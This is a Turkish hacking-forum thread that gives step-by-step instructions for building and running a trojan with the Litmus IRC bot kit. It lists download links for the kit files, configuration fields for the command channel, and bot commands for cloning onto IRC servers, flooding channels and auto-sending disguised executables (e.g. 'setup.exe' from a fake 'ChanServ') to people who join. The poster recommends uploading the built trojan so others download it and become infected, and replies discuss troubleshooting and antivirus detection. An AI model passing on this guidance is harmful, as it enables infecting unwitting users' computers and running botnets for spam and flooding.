Litmus v1.0Sevgili arkadaşlar Litmus ile trojan yapmak için gerekli olan dosyalar ve komutları sizlerle paylaşacağım. İlk önce indirmemiz gereken dosyalar 1)Config.exe (http://loonie.kewl.org/Computing/Trojan/Litmus/config.exe) 2)MSGSRV32.exe (http://loonie.kewl.org/Computing/Trojan/Litmus/MSGSRV32.exe) 3)Litmus.Dat (http://loonie.kewl.org/Computing/Trojan/Litmus/litmus.dat) Bu dosyaları indirdikten sonra tek
Konu MyDooM tarafından açılmış, 5366 kişi tarafından görüntülenip, 13 yanıt almış.
|
Özel Yazılım Trojan+, güncellemeli ve garantili. Sadece 690TL! Kredi kartınıza 12 taksit kolaylığı!
|
|||||||
Litmus v1.0 konusundaki toplam yorum: 13, okunma sayısı: 5366. |
|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
#1 |
|
Cool Üye
![]() ![]() ![]() Kayıt Tarihi: Feb 2005
Üye numarası: #1457
Karma etkisi: 8
![]() Karma: 70
|
Sevgili arkadaşlar Litmus ile trojan yapmak için gerekli olan dosyalar ve komutları sizlerle paylaşacağım.
İlk önce indirmemiz gereken dosyalar 1)Config.exe 2)MSGSRV32.exe 3)Litmus.Dat Bu dosyaları indirdikten sonra tek yapmamız gereken serverımızı oluşturmak olcak. İlk önce config.exe e tıklıyoruz.Exemizi yani trojanımızı oluşturmaya başlıyoruz. Gereken bolumleri şu şekilde dolduruyoruz. Server Bolumüne : irc.mydoom.org gibi server adini yazıyoruz.. Channel'e : #mydoom $eklinde kanaLı yazıyoruz Server Pass : Bu bölüme botların bizi tanıyacağı identi yazıyoruz doom gibi Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=1901 Channel Key : Botların gireceği kanalın şifresi. Bot PassBotları yöneteceğin şifre Nick PREfix :BoTLarın gireceği nick mydoom gibi Son Çıkan Soru :BUnun cevabına da MSGSRV32.exe yazın . Bunları uyguladıktan sonra exeniz hazırlanacaktır arkadaşlar.her tıklamada belirttiğiniz servera bir bot girecektir.Şimdi birazda trojanımızı yonlendirmek için gerekli komutları inceleyelim.. Oncelikle ßotlara Kendini Tanıtmalısın Yoksa ßotları Yonetemezsinn Komut : .ident (Botların Şifresi) Servera Cloneleri Baglamak İçin : .clones load irc.netkabus.com (port) (Clone sayısı) ßu sekiLde Cloneleri Servera ßağLarsın.. Kanala Sokma Komutu : .clones raw join #kanal Kanaldan Çıkarma Komutu : .clones raw part #kanal Kanalda Cycle Yapma Komutu : .clones raw cycle #kanal Botları Konu$turma(Flood) : .clones raw privmsg #kanal (Soylenecek) Serverdan Koparmak İçin : .clones die Diğer yeni komutları ise siz türkçeye çeviriverin The onjoin bot is supposed to reconnect when it disconnects, but i havent fully tested. .oj load <server> this will load up the bot onto any irc server Ex: .oj load irc.dal.net .oj msg <spam msg> this message will be noticed to anyone that joins a room the onjoin bot is on Ex: .oj msg Visit: http://litmuscrew.org .oj con <dothis> the onjoin bot will do this raw command when it connects Ex: .oj join #kampung,#mamak,#manila,#lima .oj quit Kills the onjoin bot .oj file <somefile> the bot will send this file to anyone who joins the room via the dcc server Ex: .oj file pub.exe .oj me <nick> name your bot uses to dcc send your file (defaults to barbara) Ex: .oj me ChanServ .oj nick <nick> changes the nick of your onjoin bot Ex: .oj nick Guest58667 .oj stain <filename> This is the name your file is sent _AS_ Ex .oj stain setup.exe .oj join <channel> Joins the on join bot to a channel ex .oj join #test Not:Bu trojanı yaparken lütfen bunu deepfreze olan bir kafede deneyin.Virüslüdür çünkü .Veya yaptıktan sonra oluşan server.exe yi çalıştırmadan silin .Çalıştırdıktan sonra silmeye kalkarsanız başaramazsınız.Ancak güvenli kipte çalıştırırsanız pc nizi o şekilde silebilirsiniz.Bol user için yaptığınız exe yi bir siteye upload edip millete indirterek user bolluğu yaşayabilirsiniz.hERkese kolay gelsin |
|
|
|
|
|
#2 |
|
Hızlı Çırak
![]() ![]() Kayıt Tarihi: Jun 2005
Üye numarası: #23683
Karma etkisi: 0
![]() Karma: 9
|
saol mydoom iyi çalışma benim beğenmediğim yanın nickinn herkes mydoom bence kendine daha ii bişey bul
|
|
|
|
|
|
#3 |
|
Cool Çırak
![]() Kayıt Tarihi: May 2005
Üye numarası: #16796
![]() Karma: 10
|
Herşey tamamda arkadasım ben bi türLü ßotlara login Olamadim
yazdıgın sekiLde hepsini yaptim yapiyorumda tanimiyor bu botlar beni yardimci olursan sevinirim. |
|
|
|
|
|
#4 |
|
Çırak
Üye numarası: #15753
|
Eywallah ama proxy den sokmuyor orasi Kötü.
|
|
|
|
|
|
#5 |
|
Forum Kalfası
![]() ![]() ![]() ![]() Kayıt Tarihi: Feb 2005
Üye numarası: #1956 Yer: cd perl\bin\serkan.pl
Karma etkisi: 53
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Karma: 4444
|
sağol arkadaş
|
|
|
|
|
|
#6 |
|
Çırak
Üye numarası: #15753
|
Ya MSGSRV32.exe Bunu silemedi benim antivirus ne yapmam gerek formatmi atmaliyim yoksa cozum yolu varmi yardim edermisin acil!
saygilar. |
|
|
|
|
|
#7 |
|
Cool Üye
![]() ![]() ![]() Kayıt Tarihi: Mar 2005
Üye numarası: #8176 Yer: CD-ROM
Karma etkisi: 8
|
saol adamım emeğine sağlık
![]() |
|
|
|
|
|
#8 |
|
Çırak
![]() Kayıt Tarihi: Mar 2005
Üye numarası: #4595
|
bota login olabilmeniz için identinizin içinde lit hecesinin geçmesi gerekiyor(lit,kalite,kilitci,elit).MSGSRV32.exe için endişelenme login i sadece sen biliyorsun
c:\windows\litmus\ klasörünün içindedir.Msconfigden kaldırıp yeniden başlat ve sil. |
|
|
|
|
|
#9 |
|
Cool Üye
![]() ![]() ![]() Kayıt Tarihi: May 2005
Üye numarası: #21443 Yer: afyon
Karma etkisi: 10
![]() ![]() ![]() Karma: 256
|
kardeşim benim awast, virüs var bu dökümanda diyo ne yapıyım?
|
|
|
|
|
|
#10 |
|
Çırak
![]() Kayıt Tarihi: Aug 2005
Üye numarası: #31669
|
kardeş paylaşım için Sağolda Bu program komutlarını nereye yazıcağız
|
|
|
|
|
|
#11 |
|
Çırak
![]() Kayıt Tarihi: Mar 2006
Üye numarası: #59734
|
|
|
|
|
|
|
#12 |
|
Çırak
![]() Kayıt Tarihi: Feb 2008
Üye numarası: #201419
|
güzel paylasım tşkler
|
|
|
|
|
|
#13 |
|
Forum Kalfası
![]() ![]() ![]() ![]() Kayıt Tarihi: Jul 2005
Üye numarası: #28531 Yer: Türkiye Cumhuriyeti
Karma etkisi: 2011
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Karma: 200436
|
Litmuslar anti viruse yakalanıor artıq...
|
|
|
|
|
|
#14 |
|
Çırak
![]() Kayıt Tarihi: Feb 2005
Üye numarası: #3293
![]() Karma: 13
|
Konu açılalı baya uzun zaman olmuş ama bilmek istediğim bir konu var exe yi oluştururken server kısmına mesela... irc.mynet.com yazsak fark edermi ? yada bunun için kendimize ayit bir serverin olması daha sonra başka servere yönlendirmemizmi gerekiyor umarım bilgisi olan bir arkadaş cevap yazar çünkü exe oluşturdum servere irc.mynet.com yazdım deepfreeze olan pcde denedim ama mynetten ziline yedim
![]() |
|
|
|
![]() |
| Şu Anda Konuyu Görüntüleyenler: 1 (0 üye ve 1 misafir) | |
| Konu Araçları | Bu Konuda Ara |
|
|